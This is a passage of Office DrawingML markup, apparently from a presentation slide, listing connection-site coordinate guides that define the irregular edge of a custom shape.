              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 448545 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY108" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 265826 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 258031 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 319080 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 345956 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 375505 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 408998 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 418597 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 438184 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 441487 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 442471 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 455016 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 459335 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY101" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY102" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY103" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY104" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY105" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY106" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY107" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 151770 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 143794 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 161862 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 228859 w 1342244"/>
